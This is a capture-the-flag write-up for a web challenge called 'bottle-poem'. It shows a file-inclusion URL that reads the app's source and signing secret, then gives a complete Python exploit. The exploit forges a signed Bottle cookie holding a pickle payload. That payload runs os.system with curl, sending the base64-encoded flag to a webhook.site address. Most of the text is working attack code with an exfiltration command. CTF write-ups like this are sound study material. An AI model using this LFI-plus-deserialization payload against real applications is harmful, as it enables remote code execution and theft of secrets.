LFI:  
http://bottle-poem.ctf.sekai.team/show?id=/app/app.py  
/sign url uses some secret to create digital signature of a user session.  
http://bottle-poem.ctf.sekai.team/show?id=/app/config/secret.py  
reveals that secret.  
So, now we can create our own customized sessions.  
Viewing the src code of bottle:  
```  
def cookie_encode(data, key):  
''' Encode and sign a pickle-able object. Return a (byte) string '''  
msg = base64.b64encode(pickle.dumps(data, -1))  
sig = base64.b64encode(hmac.new(tob(key), msg,
digestmod=hashlib.md5).digest())  
return tob('!') + sig + tob('?') + msg  
```  
There is usage of the pickle package which is vulnurable and allows RCE on
deserialization.  
  
The full code:  
```  
import base64  
import hashlib  
import hmac  
import pickle  
import requests

sekai = "Se3333KKKKKKAAAAIIIIILLLLovVVVVV3333YYYYoooouuu"  
unicode = str

def tob(s, enc='utf8'):  
return s.encode(enc) if isinstance(s, unicode) else bytes(s)

def touni(s, enc='utf8', err='strict'):  
return s.decode(enc, err) if isinstance(s, bytes) else unicode(s)

def cookie_encode(data, key):  
''' Encode and sign a pickle-able object. Return a (byte) string '''  
msg = base64.b64encode(pickle.dumps(data, -1))  
sig = base64.b64encode(hmac.new(tob(key), msg,
digestmod=hashlib.md5).digest())  
return tob('!') + sig + tob('?') + msg

class PickleRce(object):  
def __reduce__(self):  
return eval, ("os.system('curl https://webhook.site/REDACTED?p=`exec /flag | base64`')",)

payload = touni(cookie_encode(("name", {"name": PickleRce()}), sekai))  
requests.get("http://bottle-poem.ctf.sekai.team/sign", cookies={"name":
f"\"{payload}\""})  
```